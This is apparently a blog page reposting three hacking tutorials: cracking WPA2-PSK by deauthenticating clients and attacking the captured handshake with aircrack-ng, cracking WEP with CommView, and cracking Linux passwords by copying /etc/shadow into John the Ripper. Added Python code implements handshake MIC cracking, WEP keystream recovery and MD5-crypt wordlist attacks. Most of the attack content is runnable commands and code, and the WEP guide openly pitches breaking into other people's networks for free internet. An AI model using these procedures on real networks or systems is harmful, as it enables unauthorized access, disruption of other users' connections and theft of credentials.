How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng

Welcome back, my cyber hackers.
When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. You can read more about that in my beginner's guide to hacking Wi-Fi.
As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that's very difficult to crack—but not impossible. My beginner's Wi-Fi hacking guide also gives more information on this.
The weakness in WPA2-PSK is not AES but the pre-shared key itself. When a client authenticates to the access point (AP), the two go through a 4-way handshake in which they exchange random nonces and prove knowledge of the key by attaching a MIC (a keyed hash) to the handshake messages. The key for that MIC is derived from the passphrase and the SSID (PBKDF2 with 4096 iterations of HMAC-SHA1), together with the two MAC addresses and the two nonces, all of which are sent in the clear. The passphrase itself never crosses the air, but anyone who captures the handshake can recompute the MIC for a candidate passphrase offline and check whether it matches, with no further interaction with the AP.
In this tutorial from our Wi-Fi Hacking series, we'll look at using aircrack-ng and a dictionary attack against the captured 4-way handshake. If you're looking for a faster way, I suggest you also check out my article on hacking WPA2-PSK passwords using coWPAtty.

Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:
  • airmon-ng start wlan0
Note that airmon-ng has created a monitor interface named mon0 for your wlan0 adapter. Recent versions of aircrack-ng rename the adapter to wlan0mon instead, so check airmon-ng's output and use whatever interface name it reports in the commands below.

Step 2: Capture Traffic with Airodump-Ng

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
  • airodump-ng mon0
Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Step 3: Focus Airodump-Ng on One AP on One Channel

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
  • airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
  • 08:86:30:74:22:76 is the BSSID of the AP
  • -c 6 is the channel the AP is operating on
  • WPAcrack is the file you want to write to
  • mon0 is the monitoring wireless adapter
As you can see in the screenshot above, we're now focusing on capturing data from one AP with an ESSID of Belkin276 on channel 6. Belkin276 is probably a default SSID, and those are prime targets for wireless hacking, as users who leave the default ESSID usually don't spend much effort securing their AP.

Step 4: Aireplay-Ng Deauth

In order to capture the handshake, we need a client to authenticate against the AP while we're listening. If one is already authenticated, we can de-authenticate it (kick it off) and its system will automatically re-authenticate, and we capture the new 4-way handshake in the process. Note that this only works if at least one client is actually associated with the AP. Let's open another terminal and type:
  • aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
  • 100 is the number of de-authenticate frames you want to send (a handful is usually enough; add -c followed by the client's MAC address to target a single station instead of broadcasting to every client on the AP)
  • 08:86:30:74:22:76 is the BSSID of the AP
  • mon0 is the monitoring wireless adapter

Step 5: Capture the Handshake

In the previous step, we bounced the user off their own AP. When their machine re-authenticates, airodump-ng, still running in the other terminal, will record the new 4-way handshake in the WPAcrack capture file. Let's go back to that terminal and check whether it worked.
Notice in the top line to the far right, airodump-ng now reads "WPA handshake:" followed by the AP's BSSID. That is how it tells us the handshake was captured. We don't have the password yet, only the material needed to test guesses against it, but that is the first step to success! If the field doesn't appear, wait for a client to reconnect and run the deauth again.

Step 6: Let's Aircrack-Ng That Password!

Now that we have the handshake in our capture file, we can run that file through aircrack-ng with a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack named darkc0de.
We'll now attempt to crack the password by opening another terminal and typing:
  • aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
  • /pentest/passwords/wordlists/darkc0de is the absolute path to your password file

How Long Will It Take?

This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. The rate is low because every guess has to go through PBKDF2 with 4096 rounds of HMAC-SHA1 before its MIC can be checked, which is what makes WPA2-PSK much slower to attack than a plain password hash. On my dual core 2.8 GHz Intel processor, aircrack-ng tests a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.
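To make concrete what the captured handshake gives the attacker, and what aircrack-ng does with it per guess, here is the whole key hierarchy written out as an added Python example. It is not code from this post or from the aircrack-ng project. The AP MAC is the Belkin276 BSSID used above; the client MAC, the nonces, the SSID and the short wordlist are constructed for the example, and the EAPOL message 2 is a minimal frame without the RSN information element a real client would append. The PMK check for passphrase "password" on SSID "IEEE" uses the test vector published in IEEE 802.11i.

```python
import hashlib
import hmac
import os
import time

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Those 4096 iterations (8192 SHA-1 calls) are what make each guess slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Everything here except the PMK is visible in the captured handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:48]          # CCMP: KCK(16) || KEK(16) || TK(16)

# EAPOL header(4) + descriptor type(1) + key info(2) + key length(2)
# + replay counter(8) + nonce(32) + key IV(16) + RSC(8) + ID(8) = 81
MIC_OFFSET = 81

def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the whole EAPOL-Key
    frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Minimal message 2 of the 4-way handshake (constructed; a real client
    also appends its RSN IE in the key data field)."""
    body = (b"\x02"                        # descriptor type: RSN
            + b"\x01\x0a"                  # key info: MIC, pairwise, HMAC-SHA1 version
            + b"\x00\x00"                  # key length (0 in message 2)
            + replay_counter.to_bytes(8, "big")
            + snonce
            + b"\x00" * 32                 # key IV, RSC, ID (all zero here)
            + b"\x00" * 16                 # MIC field, filled in by the client
            + b"\x00\x00")                 # key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key

def crack_handshake(capture: dict, wordlist):
    """The test aircrack-ng -w runs per candidate: passphrase -> PMK -> PTK -> KCK,
    recompute the MIC of message 2 and compare it with the captured one."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None

def simulate_capture(passphrase: str, ssid: str) -> dict:
    """Stand-in for the airodump-ng capture: plays AP and client with fresh
    nonces and returns only the fields a sniffer would see (not the passphrase)."""
    ap_mac = bytes.fromhex("088630742276")          # the Belkin276 BSSID from the post
    sta_mac = bytes.fromhex("001122334455")         # hypothetical client
    anonce, snonce = os.urandom(32), os.urandom(32)
    eapol = build_msg2(snonce)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}

def guesses_per_second(ssid: str = "Belkin276", n: int = 100) -> float:
    """Single-core PBKDF2 rate: the bottleneck behind the ~500/s quoted above."""
    t0 = time.perf_counter()
    for i in range(n):
        pmk_from_passphrase("guess%d" % i, ssid)
    return n / (time.perf_counter() - t0)

if __name__ == "__main__":
    capture = simulate_capture("password", "Belkin276")
    wordlist = ["letmein", "12345678", "belkin276", "password", "qwertyuiop"]  # constructed
    print("recovered passphrase:", crack_handshake(capture, wordlist))
    print("IEEE test vector PMK:", pmk_from_passphrase("password", "IEEE").hex())
    print("about %.0f guesses/s on this core" % guesses_per_second())
```

Two things worth noticing when you run it: the only secret-dependent value the attacker ever compares against is the 16-byte MIC, so a single captured message 2 (plus message 1 for the ANonce) is enough, and the rate printed at the end is pure-Python PBKDF2, so it will be far below aircrack-ng's optimized C, but the ratio between a WPA2 guess and a plain SHA-1 call is the same everywhere.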

Stay Tuned for More Wireless Hacking Guides

Keep coming back, as I promise more advanced methods of hacking wireless in future tutorials. If you haven't seen the other Wi-Fi hacking guides yet, check them out here. Particularly the one on hacking WEP using aircrack-ng and hacking WPA2-PSK passwords using coWPAtty.
And as always, if you have questions on any of this, please ask away in the comments below. If it's something unrelated, try asking in the Null Byte forum.
Tuesday 24 February 2015
Posted by christy

How to Crack Wi-Fi Passwords—For Beginners!

An internet connection has become a basic necessity in our modern lives. Wireless hotspots (commonly known as Wi-Fi) can be found everywhere!

If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key.

Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you moved into your new house. The hardest time in your life is when your internet connection is down.

Cracking those Wi-Fi passwords is your answer to temporary internet access. This is a comprehensive guide which will teach even complete beginners how to crack WEP encrypted networks, easily.

If it's WPA2-PSK passwords you need to crack, you can use aircrack-ng or coWPAtty.
Table of Contents
How are wireless networks secured?
What you'll need
Setting up CommView for Wi-Fi
Selecting the target network and capturing packets
Waiting...
Now the interesting part... CRACKING!
Are you a visual learner?
Step 1: How Are Wireless Networks Secured?

In a secured wireless connection, internet data is sent in the form of encrypted packets. These packets are encrypted with network security keys. If you somehow manage to get hold of the key for a particular wireless network you virtually have access to the wireless internet connection.

Broadly speaking, there are two main types of encryption used.
WEP (Wired Equivalent Privacy)

This is the most basic form of encryption. This has become an unsafe option as it is vulnerable and can be cracked with relative ease. Although this is the case many people still use this encryption.
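Why WEP falls to a passive capture of enough data frames, shown as an added Python example rather than anything from this guide or from aircrack-ng. It reimplements RC4 and the WEP frame format from scratch and demonstrates the basic flaw: the 24-bit IV is sent in the clear and is the only thing that varies the keystream, so IVs repeat after a few thousand frames, and any frame whose first bytes are predictable (every ARP frame starts with the same LLC/SNAP header) hands over keystream that decrypts other frames with that IV without the key ever being known. The WEP key, IV and frames below are constructed. aircrack-ng's own attacks (FMS/KoreK and PTW) go further and recover the key itself from statistical biases in the keystream across many IVs, which is why the capture step later in this guide wants 100,000 packets.

```python
import math
import os
import zlib

def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling (KSA) then n bytes of output (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(wep_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body as sent on the air: 3-byte IV in the clear, then
    RC4(IV || key) applied to payload || CRC-32 integrity check value."""
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + xor(payload + icv, rc4_keystream(iv + wep_key, len(payload) + 4))

def wep_decrypt(wep_key: bytes, frame: bytes):
    """Returns (payload, icv_ok) for a frame produced by wep_encrypt."""
    iv, body = frame[:3], frame[3:]
    clear = xor(body, rc4_keystream(iv + wep_key, len(body)))
    payload, icv = clear[:-4], clear[-4:]
    return payload, zlib.crc32(payload).to_bytes(4, "little") == icv

# Every ARP frame on an 802.11 network starts with this LLC/SNAP header, so the
# first 8 plaintext bytes of such frames are known to the attacker in advance.
SNAP_ARP = bytes.fromhex("aaaa030000000806")

def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Keystream for this frame's IV = ciphertext XOR known plaintext."""
    return xor(frame[3:3 + len(known_plaintext)], known_plaintext)

def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt the start of any other frame that reused the same IV, no key needed."""
    return xor(frame[3:3 + len(keystream)], keystream)

def xor_of_plaintexts(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames with the same IV share a keystream: C1 ^ C2 == P1 ^ P2."""
    assert frame_a[:3] == frame_b[:3], "different IVs, keystreams differ"
    return xor(frame_a[3:], frame_b[3:])

def expected_frames_until_iv_repeat() -> float:
    """Birthday estimate for random 24-bit IVs: sqrt(pi/2 * 2**24), about 5100 frames."""
    return math.sqrt(math.pi / 2 * 2 ** 24)

def frames_until_iv_repeat(rand=os.urandom) -> int:
    """Simulate an AP choosing random IVs and count frames until one repeats."""
    seen, n = set(), 0
    while True:
        n += 1
        iv = rand(3)
        if iv in seen:
            return n
        seen.add(iv)

if __name__ == "__main__":
    key, iv = bytes.fromhex("0102030405"), b"\x2a\x2b\x2c"      # constructed 40-bit key and IV
    arp1 = wep_encrypt(key, iv, SNAP_ARP + b"\x00\x01\x08\x00\x06\x04\x00\x01" + b"A" * 18)
    arp2 = wep_encrypt(key, iv, SNAP_ARP + b"\x00\x01\x08\x00\x06\x04\x00\x02" + b"B" * 18)
    ks = recover_keystream(arp1, SNAP_ARP)                        # from one frame, no key
    print("keystream bytes for this IV:", ks.hex())
    print("second frame decrypted with them:", decrypt_with_keystream(arp2, ks).hex())
    print("IV repeats expected after ~%.0f frames, this run: %d"
          % (expected_frames_until_iv_repeat(), frames_until_iv_repeat()))
```

The recovered keystream is only as long as the plaintext you can predict, but it accumulates: every frame with a known prefix extends the table of IV-to-keystream mappings, and a busy network with a 24-bit IV space fills that table quickly. Many real APs made it worse by starting the IV at zero on every reboot rather than choosing it randomly.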
WPA (Wi-Fi Protected Access)

This is the more secure alternative. Efficient cracking of the passphrase of such a network requires the use of a wordlist with the common passwords. In other words, you use the old-fashioned method of trial and error to gain access. Variations include WPA2, which is the most secure encryption alternative to date. Although this can also be cracked using a wordlist if the password is common, it is virtually uncrackable with a strong password. That is, unless the WPS PIN (Wi-Fi Protected Setup, a separate 8-digit PIN that many routers enable by default) is still enabled, which can be brute-forced regardless of how strong the passphrase is.

Hacking WEP passwords is relatively fast, so we'll focus on how to crack them for this guide. If the only networks around you use WPA passwords, you'll want to follow this guide on how to crack WPA Wi-Fi passwords instead.
Step 2: What You'll Need
A compatible wireless adapter:

This is by far the biggest requirement. The wireless card of your computer has to be compatible with the software CommView. This ensures that the wireless card can go into monitor mode, which is essential for capturing packets. Click here to check if your wireless card is compatible.
CommView for Wi-Fi :

This software will be used to capture the packets from the desired network adapter. Click here to download the software from their website.
Aircrack-ng GUI:

After capturing the packets, this software does the actual cracking. Click here to download the software from their website.
A little patience is vital!!
Step 3: Setting Up CommView for Wi-Fi
Download the zip file of CommView for Wi-Fi from the website. Extract the file and run setup.exe to install CommView for Wi-Fi. When CommView opens for the first time it has a driver installation guide. Follow the prompts to install the driver for your wireless card.
Run CommView for Wi-Fi.
Click the play icon on the top left of the application window.

Start scanning for wireless networks.

CommView now starts scanning for wireless networks channel by channel. After a few minutes you will have a long list of wireless networks with their security type and signal. Now it is time to choose your target network.
Step 4: Selecting the Target Network and Capturing Packets

A few things to keep in mind before choosing the target wireless network:
This tutorial is only for WEP encrypted networks, so make sure you select a network with WEP next to its name. If you need to crack a WPA encrypted network, follow this tutorial instead.
Choose a network with the highest signal.
Each network will have its details in the right column.
The signal CommView shows is in dBm, a negative number: the closer to zero, the stronger the signal (-40 dBm is much better than -80 dBm), so make sure the WEP network you are choosing has the value closest to zero.

Once you have chosen your target network, select it and click Capture to start capturing packets from the desired channel.

Now you might notice that packets are being captured from all the networks in the particular channel. To capture packets only from the desired network follow the given steps.
Right click the desired network and click on copy MAC Address.
Switch to the Rules tab on the top.
On the left hand side choose MAC Addresses.
Enable MAC Address rules.
For 'Action' select 'capture' and for 'Add record' select 'both'.
Now paste the mac address copied earlier in the box below.

We need to capture only data packets for cracking. So, select D on the bar at the top of the window and deselect M (Management packets) and C (Control packets).

Now you have to save the packets so that they can be cracked later. To do this:
Go to the logging tab on top and enable auto saving.
Set Maximum Directory Size to 2000.
Set Average Log File Size to 20.
Step 5: Waiting...

Now the boring part- WAITING!

NOTE: The amount of time taken to capture enough data packets depends on the signal and the networks usage. The minimum number of packets you should capture should be 100,000 for a decent signal.

After you think you have enough packets (at least 100,000 packets), you'll need to export them.
Go to the log tab and click on concatenate logs.
Select all the logs that have been saved.
Do not close CommView for Wi-Fi.
Now navigate to the folder where the concatenated logs have been saved.
Open the log file.
Select File > Export > Wireshark/tcpdump format and choose any suitable destination.
This will save the logs with a .cap extension to that location.
Step 6: Now the Interesting Part... CRACKING!
Download Aircrack-ng and extract the zip file.
Open the folder and navigate to 'bin'.
Run Aircrack-ng GUI.
Choose WEP.
Open your .cap file that you had saved earlier.
Click Launch.
In the command prompt type in the index number of your target wireless network.
Wait for a while. If everything goes fine, the wireless key will be shown.

You may also receive a request to try with more packets. In this case wait until more packets have been captured and repeat the steps to be performed after capturing packets.

BEST OF LUCK!
Step 7: Are You a Visual Learner?

Just in case you didn't understand, you can watch this video walk-through.



Hack Like a Pro: How to Crack User Passwords in a Linux System

Welcome back, my eager hackers!
In recent blogs, I've demonstrated how to grab password hashes remotely using Metasploit's meterpreter and pwdump. Once we have the Windows passwords from the SAM file, we can then crack these hashes using tools such as Cain and Abel.
In this article, we'll look at how to grab the password hashes from a Linux system and crack the hashes using probably the most widely used password cracking tool out there, John the Ripper.
Let's boot up BackTrack and get hacking!

Where Linux Passwords Are Stored

On very old Unix systems the password hashes lived in /etc/passwd, which is world-readable because every program needs the user list; modern Linux keeps the hashes in /etc/shadow, readable only by root, and leaves an "x" placeholder in the password field of /etc/passwd. We should expect the hashes on anything other than an old legacy system to be in /etc/shadow, which also means you need root (or some other way to read that file) before any of the cracking below can start.

Step 1: Create Some User Accounts

Since our BackTrack system probably doesn't have many users on it other than our root account, let's go ahead and create a couple more accounts.
Let's create user1 with password "flower" and user2 with a password of "hacker".
I've purposely chosen dictionary words, since the time needed to crack a password grows with its length and complexity. One of the nice features of John the Ripper is its default order of attack: it starts with "single crack" mode, which builds guesses from the login name and GECOS (full name) fields; then it tries a wordlist with mangling rules; and only if that fails does it fall back to "incremental" (brute-force) mode, which is the most time consuming.

Step 2: Open John the Ripper

Now that we have a couple of regular users in our system with simple passwords, we now need to open John the Ripper. John the Ripper is a simple, but powerful password cracker without a GUI (this helps to make it faster as GUIs consume resources).
We can access it from BackTrack by going to the BackTrack button on the bottom left, then Backtrack > Privilege Escalation > Password Attacks > Offline Attacks, and finally select John the Ripper from the multiple password cracking tools available.
If you selected the correct menu item, it will open a terminal that looks like this.
By the way, feel free to close our previous terminal as we're finished with it.

Step 3: Test John the Ripper

At the prompt, type:
  • bt > john --test
This command runs John the Ripper through its built-in benchmarks for each hash type it supports and reports the speed in c/s (candidates per second), from which you can estimate how long a given wordlist will take against your hashes. Your terminal will look something like this.
Now that John has shown how fast each hash type can be tried, let's put him to work on cracking our passwords.

Step 4: Copy the Password Files to Our Current Directory

Linux stores its passwords in /etc/shadow, so what we want to do is copy this file to our current directory along with the /etc/passwd file, then "unshadow" them and store them in file we'll call passwords. So, let's type both:
  • bt > cp /etc/shadow ./
  • bt > cp /etc/passwd ./
In Linux, the cp command means copy and the ./ represents our current directory. So this command says, copy the contents of /etc/shadow to my current directory. We do the same for the /etc/passwd file.

Step 5: Unshadow

Next we need to combine the information in the /etc/shadow and the /etc/passwd files, so that John can do its magic.
  • bt > ./unshadow passwd shadow > passwords

Step 6: Crack!

Now that we have unshadowed the critical files, we can simply let John run on our password file.
  • bt > john passwords
John the Ripper will proceed to attempt to crack your passwords. As you can see, it cracked all three of ours in a matter of seconds! Of course, more complex passwords will take significantly more time, but all we need is just one user with a simple password and we have access to the account in seconds.
It's also important to note that any password cracker is only as good as its word list. For more complex or hybrid passwords, you probably want to use a password list containing far more passwords, including hybrid passwords such as "p@$$w0rd" that combine special characters into words; John's wordlist rules also generate many such variants automatically from each base word.
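The full pipeline from the two files to cracked passwords, as an added Python example that is not part of this post and not John's own code: it merges /etc/passwd and /etc/shadow the way unshadow does, then tries guesses in John's default order (login and GECOS words first, then a wordlist, each run through a few mangling rules) against the hashes. The sample passwd and shadow contents are constructed, and their hashes are generated at runtime by a from-scratch implementation of the $1$ MD5-crypt scheme found on BackTrack-era systems (modern distributions use $6$ SHA-512 or $y$ yescrypt, which need a different hash routine but the same workflow). The root password and the users' GECOS fields are made up.

```python
import hashlib
import re

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def md5_crypt(password: bytes, salt: bytes) -> str:
    """Poul-Henning Kamp's $1$ scheme, written out so the example needs no crypt(3).
    Note the 1000 stretching rounds: slow by 1994 standards, cheap today."""
    salt = salt[:8]
    ctx = hashlib.md5(password + b"$1$" + salt)
    alt = hashlib.md5(password + salt + password).digest()
    pl = len(password)
    while pl > 0:
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(password)
    while i:
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):
        c = hashlib.md5(password if r & 1 else final)
        if r % 3:
            c.update(salt)
        if r % 7:
            c.update(password)
        c.update(final if r & 1 else password)
        final = c.digest()
    groups = [((final[a] << 16) | (final[b] << 8) | final[c], 4)
              for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))]
    groups.append((final[11], 2))
    out = ""
    for v, n in groups:                       # the crypt(3) base-64 variant
        for _ in range(n):
            out += chr(ITOA64[v & 0x3F])
            v >>= 6
    return "$1$" + salt.decode() + "$" + out

# Constructed sample files. Hashes are generated here so the example is
# self-contained; a real /etc/shadow is readable only by root.
PASSWD_FILE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user1:x:1000:1000:Rose Flower:/home/user1:/bin/bash
user2:x:1001:1001::/home/user2:/bin/bash
"""
SHADOW_FILE = "\n".join([
    "root:" + md5_crypt(b"Tr0ub4dor&3xq!", b"9k2Hf7Lp") + ":16800:0:99999:7:::",
    "daemon:*:16800:0:99999:7:::",                   # locked account, nothing to crack
    "user1:" + md5_crypt(b"flower", b"abcdefgh") + ":16800:0:99999:7:::",
    "user2:" + md5_crypt(b"hacker", b"zyxwvuts") + ":16800:0:99999:7:::",
]) + "\n"

def unshadow(passwd_text: str, shadow_text: str) -> list:
    """What the unshadow tool does: copy each user's hash from shadow into the
    password field of the passwd line, so login, hash and GECOS sit together."""
    hashes = dict(line.split(":")[:2] for line in shadow_text.splitlines() if line)
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged

def candidates(login: str, gecos: str, wordlist):
    """John's default order: "single" mode seeds (login and GECOS words) first,
    then the wordlist; every word goes through a few mangling rules."""
    seeds = [login] + [w for w in re.split(r"[ ,]+", gecos.lower()) if w]
    for word in dict.fromkeys(seeds + list(wordlist)):      # dedupe, keep order
        yield word
        yield word.capitalize()
        yield word + "1"
        yield word + "123"
        yield word.translate(str.maketrans("aeios", "43105"))   # p455w0rd style

def crack(merged_lines: list, wordlist) -> dict:
    """Try candidates against every $1$ hash; skip locked or unsupported schemes."""
    found = {}
    for line in merged_lines:
        login, h, _uid, _gid, gecos = line.split(":")[:5]
        if not h.startswith("$1$"):
            continue
        salt = h.split("$")[2].encode()
        for guess in candidates(login, gecos, wordlist):
            if md5_crypt(guess.encode(), salt) == h:
                found[login] = guess
                break
    return found

if __name__ == "__main__":
    merged = unshadow(PASSWD_FILE, SHADOW_FILE)
    print(crack(merged, ["letmein", "summer", "flower", "hacker"]))   # user1 and user2 only
```

Run with an empty wordlist and user1 still falls, because "flower" appears in the GECOS field; that is exactly what John's single-crack mode exploits before a wordlist is ever opened. root survives both modes here because its password is neither in the list nor derivable from its account data, which is the whole argument for choosing passwords that way.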
We'll be doing more password cracking among numerous other hacks, so keep coming back! And if you have any questions, feel free to comment below or head to the Null Byte forum for help.

- Copyright © Cyber Bird - Posting For You - Powered by Blogger - Designed by christy m thomas -